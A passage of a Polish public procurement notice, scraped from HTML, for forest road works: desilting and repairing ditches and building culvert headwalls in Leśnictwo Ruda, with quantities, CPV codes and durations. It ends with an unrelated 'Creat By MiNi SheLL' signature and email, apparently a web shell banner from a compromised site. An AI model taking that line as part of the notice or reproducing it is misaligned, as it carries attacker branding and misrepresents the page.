Odbiór będzie polegał na pomiarze długości w mb odtworzonych i wyremontowanych rowów przy drogach leśnych, nasypów i poboczy wraz z przepustami - na gotowo. 
Wykonawca ma podać stawkę za 1mb odmulenia i naprawy rowów oraz cenę brutto za całość zamówienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.00-1, 45.11.21.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 92.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Wykonanie ścianek czołowych przepustu w Leśnictwie Ruda..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonanie ścianek czołowych przepustu okularowego O 80 na drodze leśnej 222/677 w Leśnictwie Ruda - zakres prac:
- Tymczasowe przeprowadzenie wody rurami PCV wraz z wykonaniem grobli ziemnej oraz ich demontaż - obmiar 18 m
- Wykopy oraz przekopy o głęb. do 3.0 m wykonane na odkład koparkami przedsiębiernymi o poj. łyżki 0,25 - 0,60m3 w gruncie kategorii I-II - obmiar 2*4,40*0,40*0,60 = 2,112 m3
- Obudowy wlotów (wylotów) przepustów drogowych rurowych - obmiar 2* [4,40*0,40*0,60+ 3,34*1,87*0,25-3,13*0,80*0,80*0,25*0,25 + 3,34*0,20*0,12] = 5,145 m3. Ścianki czołowe zbrojone prefabrykowane lub wykonane na miejscu. 
- Uzupełnienie nasypów i odmulenie rowu w obrębie przepustu, odmulenie i udrożnienie rur przepustu, uzupełnienie i zagęszczenie warstwy podbudowy korony drogi o grubości 0,20 m na szerokości przepustu tłuczniem o uziarnieniu 0,4-63 mm..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.11.21.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com